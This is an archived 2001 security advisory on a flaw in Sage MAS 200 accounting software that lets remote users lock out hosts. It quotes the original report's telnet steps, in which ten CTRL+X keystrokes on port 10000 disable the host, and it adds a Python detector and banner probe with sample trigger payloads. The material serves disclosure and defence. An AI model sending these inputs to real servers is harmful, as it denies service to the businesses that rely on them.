SecurityTracker
Archives
Category:   Application (Commerce)  >   MAS 200 Vendors:   Sage Software
Sage Software's MAS 200 Accounting Software Lets Remote Users Lock Out Hosts and Lock Out New Connections
SecurityTracker Alert ID:  1002239
SecurityTracker URL:  http://securitytracker.com/id/1002239
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 23 2001
Impact:   Denial of service via network, Disclosure of system information
Exploit Included:  Yes  

Description:   A denial of service vulnerability was reported in Sage Software's MAS 200 client/server accounting product. A remote user who can reach the host application's TCP port can switch the host application to 'Disabled' status, which suspends access for all MAS 200 clients, and can reportedly cause the server to stop answering new connection requests.

The original reporter connected to the host application (TCP port 10000) with telnet, pressed Enter and received the banner "The host does not support this application", then typed CTRL+X ten times followed by Enter and received "The host has been disabled". Every subsequent connection received the same "disabled" banner, and the host application's status at the server console had changed to 'Disabled', suspending client access from both the LAN and WAN sides. The keystrokes are accepted on a raw connection before any login.

Another user reported that different input causes denial of service against version 3.6 running under NT4: a single CTRL+Q reportedly disables the host, CTRL+O reportedly returns information about the system (reported as including IE, the installation path, server memory, the listening IP addresses, the computer name and the process owner), and sending arrow-key input may cause the server to stop responding to new connection requests.
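The following Python script is an added example written for this archive page; it is not code from the original report or from Sage Software. It does two things: it classifies the banner the host application returns to a bare newline (the two strings quoted in the report), so a server's state can be checked without sending the triggering input, and it scans a client-to-server payload for the byte sequences behind the reported keystrokes. The byte values are the standard ASCII control codes for those keys (CTRL+X = 0x18, CTRL+Q = 0x11, CTRL+O = 0x0F, arrow keys = ESC [ A through D in a VT100-style telnet session); that the MAS 200 host application receives them as exactly these raw bytes is an assumption, as are the function names and the sample payloads, which are constructed rather than captured.

```python
"""Added example, not code from the original report or from Sage Software.

Classifies the MAS 200 host application's banner and flags the byte sequences
the advisory says trigger the lockout.  Byte values are the standard ASCII
control codes for the named keys; that the host sees them as raw bytes is an
assumption.
"""
import re
import socket

MAS200_PORT = 10000  # port the original reporter found the host application on

# Banners quoted in the original report.
BANNER_OK = "The host does not support this application"
BANNER_DISABLED = "The host has been disabled"

CTRL_X = b"\x18"  # CAN
CTRL_Q = b"\x11"  # DC1 / XON
CTRL_O = b"\x0f"  # SI
ARROW_KEY = re.compile(rb"\x1b\[[ABCD]")  # ESC [ A/B/C/D from a VT100-style client
CTRL_X_LOCKOUT_COUNT = 10  # per the report: ten CTRL+X presses disable the host


def classify_banner(reply: bytes) -> str:
    """Map the host's reply to an empty line onto a state string."""
    text = reply.decode("ascii", errors="replace")
    if BANNER_DISABLED in text:
        return "disabled"
    if BANNER_OK in text:
        return "listening"
    return "unknown"


def find_triggers(payload: bytes) -> list:
    """Return the advisory's trigger conditions present in one client->server payload."""
    hits = []
    ctrl_x_count = payload.count(CTRL_X)
    if ctrl_x_count >= CTRL_X_LOCKOUT_COUNT:
        hits.append("ctrl-x lockout (%d x 0x18)" % ctrl_x_count)
    if CTRL_Q in payload:
        hits.append("ctrl-q host disable")
    if CTRL_O in payload:
        hits.append("ctrl-o info disclosure")
    if ARROW_KEY.search(payload):
        hits.append("arrow-key sequence")
    return hits


def probe(host: str, port: int = MAS200_PORT, timeout: float = 5.0) -> str:
    """Non-destructive state check: send only CR LF and classify the banner.

    In the original report a bare Enter produced the 'does not support' banner
    without disabling the host, so none of the trigger bytes are sent here.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"\r\n")
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass  # host keeps the connection open; classify what we have
    return classify_banner(b"".join(chunks))


# Constructed sample payloads for offline use, not captured traffic.
SAMPLE_PAYLOADS = {
    "benign enter": b"\r\n",
    "ten ctrl-x": CTRL_X * 10 + b"\r\n",
    "nine ctrl-x": CTRL_X * 9 + b"\r\n",
    "ctrl-q": CTRL_Q,
    "ctrl-o then arrows": CTRL_O + b"\x1b[A\x1b[B",
}


if __name__ == "__main__":
    import sys
    for name, payload in SAMPLE_PAYLOADS.items():
        print("%-20s -> %s" % (name, find_triggers(payload)))
    if len(sys.argv) > 1:
        print("host state:", probe(sys.argv[1]))
```

Run with a hostname argument to check a live server; without one it only classifies the constructed payloads. Two caveats on the trigger bytes: CTRL+Q is also the XON flow-control character, so some telnet clients will not transmit it at all, and the arrow-key bytes depend on the client's terminal emulation, so a detector watching port 10000 traffic should treat these patterns as indicators rather than as an exact signature of the reported keystrokes.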

Impact:   A remote user can disable the MAS 200 host application, suspending access for all clients, and may be able to cause the server to not respond to new connection requests. A remote user may also be able to obtain information about the server system.
Solution:   No vendor fix was available at the time of this entry. Because the reported input is accepted on a raw, unauthenticated connection, restricting access to the host application's TCP port (10000) to known client addresses at a firewall limits who can reach it; this is a network-level workaround, not a vendor-supplied solution.
Vendor URL:  www.us.sage.com/mas90/mas90cs/nt/default.asp (Links to External Site)
Cause:   State error
Underlying OS:  Windows (NT), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  Bug in MAS90 Accounting Platform remote access?



Greetings, 

Not sure if any previous issues with this application have surfaced here, but I've run

Sage Software's MAS 200 is an accounting platform which can be
configured to permit remote access to server-side data over TCP/IP. A
host application listens for connections on the server, and all remote
clients use a workstation app to interface with the host. 

Running a port scanner determined that the MAS 200 host application
listens for connections on port 10000.....

telnet x.x.x.x  port: 10000

Connected...

<enter>

"The host does not support this application"

<control + x> X 10    <enter>

"The host has been disabled"...

exit

telnet x.x.x.x port: 10000

Connected...

<enter>

"The host has been disabled"...

--------------------------------------------------------------

Checking the status of the host app at the server console revealed it had indeed been switched to 'Disabled' status, and all access to the server from clients on the LAN and WAN sides through the client application had been suspended. Am I missing something here? Or is it way too easy to DoS this software?
